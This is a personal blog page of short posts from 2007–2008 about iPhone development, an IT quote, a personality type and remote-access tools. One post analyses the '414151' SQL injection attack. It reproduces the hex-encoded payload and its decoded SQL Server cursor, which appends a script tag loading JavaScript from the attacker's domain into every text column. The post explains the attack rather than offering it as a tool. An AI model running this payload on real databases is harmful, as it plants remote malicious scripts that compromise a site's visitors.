April 18th, 2008
So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that. 
But it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought mYself an iPhone.
According to Mossberg that was probably a mistake and probably a bigger one than I realized. He thinks the 3G version is coming out in June. My bad was that I didnt realize it but in order to actually install the programs you write with the sdk on to your device it needs to be "provisioned". Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this. Anyway, I cant get provisioned until I am accepted into the developer program and pay my $99. And at the moment they are not accepting applications:
Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.
I hope to keep writing about my experience, but for now. See ya.
April 18th, 2008
Overview
So seeing sites hacked is pretty cool unless it’s one of yours. I kinda look at hacking as the end-all-be-all of elite programming. Of course, the intent isn’t always good, but the techniques are artful. I most recently witnessed an impressive SQL Injection hack on a website. I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently. Of course anyone who has been hacked by this code will recognize these numbers. As far as SQL Injection attacks go this one seems to have taken a similar systematic approach. I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that. I will list some references at the end.
The Details
There were a couple things that impressed me about this particular hack.
- The outcome was that the hack code inserted a <script> tag with a reference url into every varchar column in the database. The site was running .Net, IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server. That said, don’t fool yourself to think that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices. Specifically inline or free SQL statements within code and could occur on any (most) platform, language or database. The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve. It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
- The second thing that impressed me was the actual code that executed this varchar manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
The Possibilities
The possibilities of this hack scare me (and impress me). When I started searching around the web for this 414151 script I found a good number of references. Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also. I list one link below of an article that talks about it quite a lot. According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.
It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.
The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
The SQL Statement
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM
Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+
”<script src=http://www.414151.com/fjp.js></script>”’)FETCH NEXT
FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Other references
Update (4/29)…
This one keeps going and going.
I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks. I didn’t mention this earlier because this is inherent in all SQL Injection attacks.
April 17th, 2008
Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.
March 24th, 2008
Guess who is?
Of all the general personality types, ENFJ’s are the most outgoing and friendly. Their chief concern in life is other people, and fostering harmony and cooperation, between themselves and others. They are more than willing to do your share in relationships. They try, always, to be friendly, sympathetic, cooperative and tactful.
They have strong ideals and a potent sense of loyalty, whether to an employer, a school, a hometown, or a favourite cause. One thing is certain: they do tend to idealize the people and things they value, and they like to be held in similarly high esteem.
They are a judging type, and disorganized situations strike them as chaotic. They are distinctly uncomfortable when they’re obliged to function without a schedule, a plan, or a clear idea of the objectives to be achieved.
If need be, they’ll provide the necessary direction, but they don’t insist on setting all the rules themselves. They accept authority.
They’re patient and conscientious. They make a concerted effort to stick to a job until it’s finished, and they believe it’s important to pay attention to detail. Perhaps more significantly, they base their personal habits on a feeling of obligation to the task, their profession, their friends, family and co-workers, or to the institution itself.
They don’t mind letting others know what their values are, and-given the authority-they may insist that others follow their code and their standards.
The combination of feeling and judgment is also the fertile soil upon which righteous indignation flowers. They may find it helpful to temper their strong feeling with a less emotional thinking approach to judgment and to balance their judgment with more open-minded perception.
February 29th, 2008
Came time that I needed a presence. I used to redo my website every year, sometimes everys six months. Well, it has been a while but lately I feel the necessity to jump back in. Through WordPress I can get things off and running and the thought was I would spend my time creating content instead of design but then it took me two days to pick a theme that someone else made. Best intentions I guess. Thanks for visiting.
September 17th, 2007
Not a lot of notes because it was hot and the Mac was burning my lap.
- HitTail, Mike Levin
- Confabb, Jason Rozenblat
- Diet Television, Ken Seiff
- UpNext, Danny Moon
- Parkwhiz, Jon Thornton
- Amazon (EC2& S3), Jinesh Varia
July 31st, 2007
I generally use Orb to get to my stuff at home when I am remote. Love Orb, but its slow and it tends to be unavailable. It hasnt been stable since Vista.
From a previous post I started using JungleDisk - which works great and its cheap. I just started this week to use it to back up picture - cant wait for the bill now. JD is great, but I started having issues with OneNote on my laptop (MB Pro). Still trying to figure that out - I think it may have something to do with a Vista bug where the drive letter thinks its disconnected but it isnt. SP1?
Anyway, an alternative service is Logmein. Going to experiment.
